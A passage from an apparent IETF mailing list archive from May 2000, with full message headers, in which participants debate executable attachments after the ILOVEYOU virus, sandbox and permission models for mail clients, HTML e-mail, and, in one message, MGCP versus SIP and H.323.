Date: Fri, 12 May 2000 11:08:07 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: mail sandbox wall authority, inward and outbound
Cc: [EMAIL PROTECTED]
In-Reply-To: <F3E15FD680AED311A6E600E0291E108C0713A3@GALATICA>
X-Loop: [EMAIL PROTECTED]
> From: Jim Busse <[EMAIL PROTECTED]>
> Date: Fri, 12 May 2000 10:11:36 -0700
>
> I get 240 emails/day.
>
> about 15% have executable attachments, because that's the way developers use
> mail, we attach self-expanding zip files.
>
> My organization has about 100 people that fall into this category.
First off, not only would you all save space if you stopped
exchanging self-extracting (executable) archives, but your
organization would be far less vulnerable. Use the ordinary
zip files instead.
> I find it unacceptable that you are asking some console operator to
> 1. Determine if my zip files are legitimate....
By "console operator", I mean you, the user, or whoever is
sitting at your keyboard when your mail is being read.
Cheers,
James
>From owner-ietf-outbound Fri May 12 14:50:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA09730
for [EMAIL PROTECTED]; Fri, 12 May 2000 14:50:02 -0400 (EDT)
Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA08949
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 14:11:13 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id OAA21284
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 14:10:22 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: HTML, Scripts and its Dangers in e-mail
Date: Fri, 12 May 2000 14:10:58 -0400
Message-ID: <007601bfbc3d$6cdb46c0$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
In-reply-to: <[EMAIL PROTECTED]>
Importance: Normal
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Heres your threads name change =)
Scot
>From owner-ietf-outbound Fri May 12 15:00:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA09872
for [EMAIL PROTECTED]; Fri, 12 May 2000 15:00:02 -0400 (EDT)
Received: from latimer.mail.easynet.net (latimer.mail.easynet.net [195.40.1.40])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA09156
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 14:27:23 -0400 (EDT)
Received: from magazov (tnt-13-177.easynet.co.uk [212.134.22.177])
by latimer.mail.easynet.net (Postfix) with SMTP
id F01C5544FB; Fri, 12 May 2000 19:27:21 +0100 (BST)
Message-ID: <000001bfbc3f$cebfc8a0$b11686d4@magazov>
From: "salavat" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Subject: Re: Thought about Security
Date: Fri, 12 May 2000 15:19:11 +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Betsy Brennan wrote:
>I was wondering, does it sound like a good idea to take [EMAIL PROTECTED]
>out of our address books. This would prevent email virus's from
>spreading through this forum. Betsy Brennan
I think you just should not open an attachments unless you are absolutely
sure it is safe. I mean you know what is in the attachment and it doesn't
sound odd like subject ILOVEYOU from IETF mailing list.
Regards
Salavat R. Magazov
P.S. I do not have [EMAIL PROTECTED] in my address book.
>From owner-ietf-outbound Fri May 12 15:10:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA10267
for [EMAIL PROTECTED]; Fri, 12 May 2000 15:10:02 -0400 (EDT)
Received: from dns3.nec.com (dns3.nec.com [131.241.15.5])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA09432
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 14:36:24 -0400 (EDT)
Received: from netkeeper.sj.nec.com (netkeeper.sj.nec.com [131.241.31.2])
by dns3.nec.com (ready at/) with ESMTP id LAA29271;
Fri, 12 May 2000 11:34:32 -0700 (PDT)
Received: from galatica.pc.sj.nec.com (localhost [127.0.0.1])
by netkeeper.sj.nec.com (8.9.1a/8.9.1) with ESMTP id LAA29512;
Fri, 12 May 2000 11:34:00 -0700 (PDT)
Received: by GALATICA with Internet Mail Service (5.5.2448.0)
id <KLH8G3XK>; Fri, 12 May 2000 11:26:54 -0700
Message-ID: <F3E15FD680AED311A6E600E0291E108C0713B3@GALATICA>
From: Jim Busse <[EMAIL PROTECTED]>
To: "James P. Salsman" <[EMAIL PROTECTED]>, Jim Busse <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: RE: mail sandbox wall authority, inward and outbound
Date: Fri, 12 May 2000 11:26:47 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Since you don't know the environment, I won't bother to respond to
vunerability.
Ok. How can [EMAIL PROTECTED] know if the attached executible file is
safe or not? I can understand in my own context. I don't have a hope to
understand in someone else's context.
Jim
-----Original Message-----
From: James P. Salsman [mailto:[EMAIL PROTECTED]]
Sent: Friday, May 12, 2000 11:08 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: mail sandbox wall authority, inward and outbound
> From: Jim Busse <[EMAIL PROTECTED]>
> Date: Fri, 12 May 2000 10:11:36 -0700
>
> I get 240 emails/day.
>
> about 15% have executable attachments, because that's the way developers
use
> mail, we attach self-expanding zip files.
>
> My organization has about 100 people that fall into this category.
First off, not only would you all save space if you stopped
exchanging self-extracting (executable) archives, but your
organization would be far less vulnerable. Use the ordinary
zip files instead.
> I find it unacceptable that you are asking some console operator to
> 1. Determine if my zip files are legitimate....
By "console operator", I mean you, the user, or whoever is
sitting at your keyboard when your mail is being read.
Cheers,
James
>From owner-ietf-outbound Fri May 12 15:20:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA10539
for [EMAIL PROTECTED]; Fri, 12 May 2000 15:20:02 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA09967
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 15:01:13 -0400 (EDT)
Received: from [130.237.150.138] (jph1.dsv.su.se [130.237.150.138])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id VAA01511 for <[EMAIL PROTECTED]>;
Fri, 12 May 2000 21:01:10 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210112b541f201336f@[130.237.150.138]>
In-Reply-To:
<00ae01bfbb7b$c7f8b500$[EMAIL PROTECTED]>
References:
<00ae01bfbb7b$c7f8b500$[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 19:51:29 +0200
To: IETF general mailing list <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: HTML in e-mail (Was: VIRUS WARNING)
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 13.59 -0400 0-05-11, Scot Mc Pherson wrote:
> I am not so sure I totally agree. Why exactly do we need HTML based
> e-mail...Is it really necessary? E-mail is a service for transmitting a
> written message, and written messages certainly don't require background
> graphics or a full blown graphically based webpage.
Why should not graphics be of value in e-mail, when it is of
value in most other media like web pages, books, newspapers,
magazines, etc? Why should the e-mail medium not benefit
from graphics to enhance understandability and readability?
The size of the messages is really not an important issue.
Nets and disk space is not very expensive.
What is important, however, is writing time versus reading
time. Including graphics and neat formatting will increase
the writing time, but will, by making the message easier
to understand, reduce the writing time. This means that
neatly formatted messages give a cost/benefit gain, if
the number of recipients of a message is over a certain
limit. Thus, neatly formatted messages are more worth the
cost if you are mailing to a large mailing list than to
a single recipient.
In some cases, of course, neat formatting is so important
that it is worth the cost even with very few recipient.
For example, when I send error reports on computer software
to the developers of the software, I often include screen
shots showing how ther software does not work properly.
In such a case, the graphic is a very good way of persuading
the developer that something really is wrong with his
software.
At 15.04 -0400 0-05-11, Scot Mc Pherson wrote:
> Those newsletters that you have spoken of can quite
> easily be distributed
> in text format with the standard html tags that are used
> in text based messages already.
Is the issue you are discussing whether to include the
graphics as body parts of the e-mail sent, or just include
<IMG> links, so that the recipient can retrieve them
through HTTP when reading. This is again a cost/efficiency
issue, you will have to compute the cost of sending and
storing all these images, versus the cost and time delay of
getting them from the source when reading them. In some
cases, the original image may not be retrievable through
HTTP for the people you are sending the mail to. For
example, you may want to send, in e-mail, an image from
an Intranet not available outside your company. In that
case, you have to include the image with the mail.
At 15.04 -0400 0-05-11, Scot Mc Pherson wrote:
> Regardless of whether a list
> or commerce wishes to advertise through e-mail, there are already avenues
> for distributing material to demographically selected individuals.
World Wide Web is *not* a good medium for distributing
news, since it does not have very good "news control", i.e.
facilities for a user to get lists of what is new and
selecting from these. E-mail, Usenet News and forum
software are much better for news distribution.
At 15.04 -0400 0-05-11, Scot Mc Pherson wrote:
> The issue here is not about whether it is technologically sound, but whether
> we are able to market the masses with or without their expressed consent.
This is, I believe, the crucial point. HTML in e-mail
has got a bad reputation, not because the idea of
graphics in e-mail is wrong, but because it is
used, tooo much, by people sending us things
we would prefer not to get.
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Fri May 12 15:30:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA10746
for [EMAIL PROTECTED]; Fri, 12 May 2000 15:30:02 -0400 (EDT)
Received: from speedcom3.speedlan (adsl-200-1.bvi1-csr1.tpa.fl.verio.net
[204.251.128.31])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA10312
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 15:11:10 -0400 (EDT)
Received: by SPEEDCOM3 with Internet Mail Service (5.5.2650.21)
id <KR6AKZP1>; Fri, 12 May 2000 15:04:58 -0400
Message-ID: <0E97488D670BD411B8BD00C0F03BDF643BB6@SPEEDCOM3>
From: Administrator <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: remove
Date: Fri, 12 May 2000 15:04:56 -0400
Return-Receipt-To: Administrator <[EMAIL PROTECTED]>
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
boundary="----_=_NextPart_001_01BFBC44.F614FA92"
X-Loop: [EMAIL PROTECTED]
This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.
------_=_NextPart_001_01BFBC44.F614FA92
Content-Type: text/plain;
charset="iso-8859-1"
------_=_NextPart_001_01BFBC44.F614FA92
Content-Type: text/html;
charset="iso-8859-1"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2650.12">
<TITLE>remove</TITLE>
</HEAD>
<BODY>
<BR>
</BODY>
</HTML>
------_=_NextPart_001_01BFBC44.F614FA92--
>From owner-ietf-outbound Fri May 12 15:40:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA11599
for [EMAIL PROTECTED]; Fri, 12 May 2000 15:40:03 -0400 (EDT)
Received: from leonid.genesyslab.com (pbinat33.genesyslab.com [209.233.177.33])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA10322
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 15:11:33 -0400 (EDT)
Received: (from egoshin@localhost)
by leonid.genesyslab.com (8.9.3/8.9.3) id MAA02216;
Fri, 12 May 2000 12:10:12 -0700
Date: Fri, 12 May 2000 12:10:12 -0700
From: Leonid Yegoshin <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: mail sandbox wall authority, inward and outbound
Cc: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
>From: Jon Crowcroft <[EMAIL PROTECTED]>
>
>the problem with sandboxes is that they are monolithic as is this
>discussion of mail - if i have a notion of a compartmentalized system
>with users, and access rights (like almost all operating systems from the
>late 60s onwards, but not like
>simple desk top single user executives as found on many personal
>computers today unfortuantely),
>then i can have mail agents run scripts, but with the authorities of
>the user, perhaps restricted further by some context, and i can then
>configure arbitrary rights w.r.t each possible tool that the script
>might invoke - some of these can be gathered togethre under the
>headings of "file input, output, exectution, creation etc", and others
>under the rights of "audio/video/mouse/itneraction with user",
You right ... if we don't take into account the purpose of E-mail
exchange/web browsing. E-mails/web communication services a presentation
purpose. In strict point it is nothing to story/change in my permanent
files beyond E-mail archivation itself. Of course, it may _use_ public
resources on my host but not change it. If E-mail/HTTP hit wants to
store something it may have separate box archived with E-mail.
Three questions:
- send files or something to outside (another user): it should be
controlled by user approval for this particular mail/web site.
This approval may be saved for future.
- change/upgrade files on system (mail/HTTP upgrade):
it should be approved by signature first and user approval second.
Cookie/auth data may be considered as E-mail/HTTP private and
it may be contained in sand-box itself.
- Data extraction from E-mail/web page: it is difficult problem
for security purpose because user may copy virus incapsulated
in data object. It highly depends from object design. But at least
it is not automatic and user should be seduced to do so.
Love viruses are not final example of nature or dark invention.
However it is possible to separate objects on script/execs
and simple screen/voice presentation and warn user about difference
during copy/extraction. Screen and sound speakers are also some kind of
sand-box :-) (We may do not consider tools for pirat recording of
played music or latest movie)
>"network i/o to such and such an address (list)", etc
>for conveneicnce and expressiveness in the ACL system (other
>management tools like user, other, groups etc help scale the task)
>and then i can design a set of sensible securioty policies for a site,
>and employ an expert to configure things for everyone - typically,
>with good systems, defaults and default operating system notions of
>user, file permissions, sudo type access etc, will suffice...
>
Centralized rights configuration can't solve a problem.
The protection problem can be formulated in simple terms which are
clear and understandable for user. And end user decides about risk.
Nobody knows better about user trustees than user himself.
But to do so it is need to draw security boundary in convenient way for
end user.
>iff you start with a decent system;
>otherwise, forget it - someone will always find a way to set things up
>disastrously wrong, because it will be the only way to get work done
>....this is a standad problem with systems that impose all or nothing
>security - either they leak like a sive or users find them
>unusable...
It depends on design. If high security is not huge unconvenience for
user then virus replication performance decrease dramatic and we lower
the number of people who wants to write them.
- Leonid Yegoshin.
>so the solution is to ditch indecent systems.
>
>In message <[EMAIL PROTECTED]>, Leonid Yegoshin typed
>:
>
> >>>From: "James P. Salsman" <[EMAIL PROTECTED]>
> >>>
> >>>A MUA might ask the console operator for permission to proceed when:
> >>>
> >>>1. A mail message wants to run a program. (e.g., ECMAscripts.)
> >>>
> >>>2. An attachment is executable. (Nearly universal practice.)
> >>>
> >>>3. A program wants to write to a file. (Usually not trapped more
> >>>than once per execution if at all.)
> >>>
> >>>4. A program wants to read your address book. (Does any mail system
> >>>that offers this functionality limit it at all?)
> >>>
> >>>5. A program wants to send mail. (e.g., having MAPI's Send notify
> >>>the user and queue the proposed message as a draft instead of sending.)
> >>>
> >> 6. A program wants to send a file to somewhere. Or any permanently stored
> >> information (like cookie but not limited).
>From owner-ietf-outbound Fri May 12 15:50:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA12397
for [EMAIL PROTECTED]; Fri, 12 May 2000 15:50:02 -0400 (EDT)
Received: from leonid.genesyslab.com (pbinat33.genesyslab.com [209.233.177.33])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA10331
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 15:11:43 -0400 (EDT)
Received: (from egoshin@localhost)
by leonid.genesyslab.com (8.9.3/8.9.3) id KAA02128;
Fri, 12 May 2000 10:53:52 -0700
Date: Fri, 12 May 2000 10:53:52 -0700
From: Leonid Yegoshin <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: mail sandbox wall authority, inward and outbound
Cc: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
>From: Markku Savela <[EMAIL PROTECTED]>
>
>I think we should "turn around the view" (maybe you were saying this
>in another way).
>
>That is, instead of ACL type protection, where a resource is
>associated with a list of allowed users and uses, we should have a
>list of allowed resources and uses attaced to each program
>(exectutable or active object).
>
>And by default, a program could not access any resources at all.
>
>In case of mail attachment containing an executable, we could quite
>safely try to run it, and the system would just inform that it tries
>to open this or that file (do you want to allow it?), trying to
>open TCP connection to port 25 (do you want to allow it?), or tries to
>execute another program (do you want to allow it?).
I hope you joke. How many users know what means
"TCP connection to port 25" ?
And how many Windows users know "attached program wants to open
file C:\windows\cpl32.xxx: is it legitimate ?"
Predicted reaction after month or two is - press "OK".
- Leonid Yegoshin.
>From owner-ietf-outbound Fri May 12 16:00:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA12959
for [EMAIL PROTECTED]; Fri, 12 May 2000 16:00:02 -0400 (EDT)
Received: from anise.tte.vtt.fi (anise.tte.vtt.fi [130.188.52.29])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA11700
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 15:41:06 -0400 (EDT)
Received: (from msa@localhost)
by anise.tte.vtt.fi (8.8.5/8.8.5) id WAA32256;
Fri, 12 May 2000 22:40:59 +0300 (EET DST)
Date: Fri, 12 May 2000 22:40:59 +0300 (EET DST)
From: Markku Savela <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
CC: [EMAIL PROTECTED]
In-reply-to: <[EMAIL PROTECTED]> (message from Leonid
Yegoshin on Fri, 12 May 2000 10:53:52 -0700)
Subject: Re: mail sandbox wall authority, inward and outbound
Reply-to: [EMAIL PROTECTED] (Markku Savela)
X-Loop: [EMAIL PROTECTED]
> From: Leonid Yegoshin <[EMAIL PROTECTED]>
> >From: Markku Savela <[EMAIL PROTECTED]>
> >In case of mail attachment containing an executable, we could quite
> >safely try to run it, and the system would just inform that it tries
> >to open this or that file (do you want to allow it?), trying to
> >open TCP connection to port 25 (do you want to allow it?), or tries to
> >execute another program (do you want to allow it?).
>
> I hope you joke. How many users know what means
> "TCP connection to port 25" ?
Not joking, but those were just provided to give an idea of types of
checks that might be done. Default action should probably be to reject
operation with error message.
But, that was not my point. My point was that with such a protection
system, the whole virus/trojan/worm problem practically
disappears. You can download any executable and safely run it by
default. If it needs access to resources, it would be accompanied with
the resource list that you are supposed to install. This list could be
signed by some authority, which would be checked by the default
installation process.
The difference to signing programs and my suggestion is: signed
program may have bugs that cause it to do damage. But, in the proposed
system, even if program has bugs, it can only damage the resources it
has explicit access. This is especially good for programs that are
traditionally run as root. Usually this root requirement is only
because they need access to few special files or directories. Such
files are easily listed in the resource list.
--
Markku Savela ([EMAIL PROTECTED]), Technical Research Centre of Finland
Multimedia Systems, P.O.Box 1203,FIN-02044 VTT,http://www.vtt.fi/tte/staff/msa/
>From owner-ietf-outbound Fri May 12 16:10:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA13369
for [EMAIL PROTECTED]; Fri, 12 May 2000 16:10:02 -0400 (EDT)
Received: from apollo.dmnews.com (mail.dmnews.com [204.141.161.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA13326
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 16:08:43 -0400 (EDT)
Received: by mail.dmnews.com with Internet Mail Service (5.5.2448.0)
id <HNLHM0Y3>; Fri, 12 May 2000 16:15:23 -0400
Message-ID: <[EMAIL PROTECTED]>
From: Lillian Komlossy <[EMAIL PROTECTED]>
To: "'salavat'" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: Thought about Security
Date: Fri, 12 May 2000 16:15:22 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Salavat R. Magazov wrote:
>I think you just should not open an attachments unless you are absolutely
>sure it is safe. I mean you know what is in the attachment and it doesn't
>sound odd like subject ILOVEYOU from IETF mailing list.
Now THAT would sound really odd! LOL
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
>From owner-ietf-outbound Fri May 12 16:50:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA14458
for [EMAIL PROTECTED]; Fri, 12 May 2000 16:50:02 -0400 (EDT)
Received: from ljcqs016.cnf.com (egate1.cnf.com [205.185.108.239])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA14390
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 16:46:55 -0400 (EDT)
Received: from mwabs030.emeryworld.com (localhost [127.0.0.1])
by ljcqs016.cnf.com (8.9.3/8.9.3) with ESMTP id NAA17657;
Fri, 12 May 2000 13:46:24 -0700 (PDT)
Received: by mwabs030.emeryworld.com with Internet Mail Service (5.5.2650.21)
id <KL30CDHG>; Fri, 12 May 2000 20:39:43 -0000
Message-ID: <[EMAIL PROTECTED]>
From: "Dawson, Peter D" <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Date: Fri, 12 May 2000 20:45:57 -0000
Return-Receipt-To: "Dawson, Peter D" <[EMAIL PROTECTED]>
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
this is a good idea !! maybe the security wg could look
into this. Jeff, Marcus , any comments ??
/pd
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Friday, May 12, 2000 2:05 PM
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
On Fri, 12 May 2000 13:38:43 EDT, Jeremy said:
> Can you plase pleaes stop this Virus Thread.
Actually, there *ARE* important issues here.
Would the IESG support the creation of a WG to discuss these, with the
charter of producing a BCP documenting what *should* be done to minimize
these risks in today's internet?
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Fri May 12 18:10:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA17183
for [EMAIL PROTECTED]; Fri, 12 May 2000 18:10:02 -0400 (EDT)
Received: from mail4.microsoft.com (mail4.microsoft.com [131.107.3.122])
by ietf.org (8.9.1a/8.9.1a) with SMTP id SAA16952
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 18:02:41 -0400 (EDT)
Received: from 157.54.9.103 by mail4.microsoft.com (InterScan E-Mail VirusWall NT);
Fri, 12 May 2000 15:01:11 -0700 (Pacific Daylight Time)
Received: by INET-IMC-04 with Internet Mail Service (5.5.2651.58)
id <KYFNJG9K>; Fri, 12 May 2000 14:55:55 -0700
Message-ID:
<[EMAIL PROTECTED]>
From: Christian Huitema <[EMAIL PROTECTED]>
To: "'Yixin Zhu'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: RE: Any comparison Study on MGCP vs H.323, MGCP vs SIP
Date: Fri, 12 May 2000 14:55:58 -0700
X-Mailer: Internet Mail Service (5.5.2651.58)
X-Loop: [EMAIL PROTECTED]
>From the SGCP FAQ (http://www.argreenhouse.com/sgcp/sgcp-faq.shtml) written
two years ago:
Do you intend to replace H.323 ?
Definitely not. Just look at the picture above, which shows the relaying of
a call
between an SGCP controlled gateway and an H.323 agent. The combination of
gateways plus call agent forms a distributed H.323 system, which is
perfectly conforming to the H.323 standard...
If not H.323, why not SIP, then?
In fact, when we realized that we could not use H.323 between the call agent
and the gateways, we tried to base the design of SGCP on SIP. But we
stumbled on the fact that SIP is a peer to peer protocol, while we needed a
master slave protocol. However, interworking between SIP and SGCP is very
easy...
(SGCP is one of the ancestors of MGCP.)
-- Christian Huitema
> -----Original Message-----
> From: Yixin Zhu [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, May 11, 2000 7:55 AM
> To: [EMAIL PROTECTED]
> Subject: Any comparison Study on MGCP vs H.323, MGCP vs SIP
>
>
> Hi,
>
> There are studies on the comparision of the two competing
> protocol SIP and
> H.323. However, MGCP can also provide call control functionalities. A
> network with MGCP only (Call agent, MG etc) can provide basic
> VoIP service
> too. Then my questions are
>
> 1. Are there any comparison study between MGCP and H.323?
>
> 2. Are there any comparision study between MGCP and SIP?
>
>
> You help is very much appreciated. Thanks,
>
>
> Yixin (James) ZHU
>
>
>From owner-ietf-outbound Fri May 12 18:20:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA17304
for [EMAIL PROTECTED]; Fri, 12 May 2000 18:20:02 -0400 (EDT)
Received: from mail4.microsoft.com (mail4.microsoft.com [131.107.3.122])
by ietf.org (8.9.1a/8.9.1a) with SMTP id SAA17249
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 18:13:32 -0400 (EDT)
Received: from 157.54.9.103 by mail4.microsoft.com (InterScan E-Mail VirusWall NT);
Fri, 12 May 2000 15:12:04 -0700 (Pacific Daylight Time)
Received: by INET-IMC-04 with Internet Mail Service (5.5.2651.58)
id <KYFNJ2ZT>; Fri, 12 May 2000 15:12:20 -0700
Message-ID:
<[EMAIL PROTECTED]>
From: Christian Huitema <[EMAIL PROTECTED]>
To: "'Vernon Schryver'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Date: Fri, 12 May 2000 15:12:22 -0700
X-Mailer: Internet Mail Service (5.5.2651.58)
X-Loop: [EMAIL PROTECTED]
> All of that can be done in pure ASCII.
... that is, if you speak english. You can definitely write the way of
Shakespeare, but you have a tiny problem writing the way of Molière, let
alone Confucius. Then, there are things that are hard to do in writing,
however able is your prose. Maps and pictures, songs and recordings come to
mind. There was a rationale for creating MIME.
Framing the debate as ASCII versus HTML is a bit reductive. The real
separation here is self-contained versus network based. Carrying a picture
in a message is definitely valuable, carrying a link to a picture that is
stored on some random web site creates an obvious privacy risk -- the URL
itself can be the hidden communication channel that tracks you.
>From owner-ietf-outbound Fri May 12 19:50:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA18203
for [EMAIL PROTECTED]; Fri, 12 May 2000 19:50:04 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA18073
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 19:44:39 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id QAA06637;
Fri, 12 May 2000 16:44:09 -0700 (PDT)
Date: Fri, 12 May 2000 16:44:09 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: mail sandbox wall authority, inward and outbound
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
Harald,
Thank you for your reply to my message:
>> These sorts of things are less common on the more heterogeneous
>> Unix world, but Unix mailers are just as culpable. If I wanted to
>> be consistent, I would demand that anything I run on Unix (without
>> a special permitted shell) which connects to port 25 should be
>> intercepted, wrapped with an "ok queued" SMTP response, and
>> forwarded to me instead. Would anyone argue that isn't reasonable?
>
> Yes, but only because I have 15 different programs that more or less
> indirectly invoke /usr/sbin/sendmail for various reasons.
> Most of them are tools invoked from cron.
As long as your OS looks at an enviroment-based path for the shared
net library, you can replace those in standard locations with the
wrapped versions, and prepend their new location to the head of your
trusted programs' loader's path.
> In a fine-grained capabilities control system, I'd have the "send email" as
> one access control descriptor I could grant these programs.
> But that's not been implemented in any widespread system I know of.
Are there even cross-platform specs yet?
Cheers,
James
--
IMS Q&TI Editor project description: http://www.bovik.org/imsqtied.html
Open-source development: http://sourceforge.net/project/?group_id=3308
>From owner-ietf-outbound Fri May 12 20:00:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA18489
for [EMAIL PROTECTED]; Fri, 12 May 2000 20:00:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA18388
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 19:57:20 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id QAA11925;
Fri, 12 May 2000 16:57:19 -0700 (PDT)
Date: Fri, 12 May 2000 16:57:19 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: mail sandbox wall authority, inward and outbound
Cc: [EMAIL PROTECTED]
In-Reply-To: <F3E15FD680AED311A6E600E0291E108C0713B3@GALATICA>
X-Loop: [EMAIL PROTECTED]
Jim,
Thanks for your question:
> How can [EMAIL PROTECTED] know if the attached executible
> file is safe or not?
If I knew that, I wouldn't be trying to stop complacency
about the promiscous exchange of self-extracting archives.
The best attempts to address the issues so far involve
"certificate-signed executables", a cryptological method of
verifying that some certificate authority approves of a
given fixed string of bits. Do a search on that and/or
"application signing" to learn more. A caveat in practice,
though, so far signed executables do not seem to have
caught on. At best, they are complicated to get right and
involve an increased support cost if done wrong. At worst,
the certificate authorities, who often have a strangle-hold
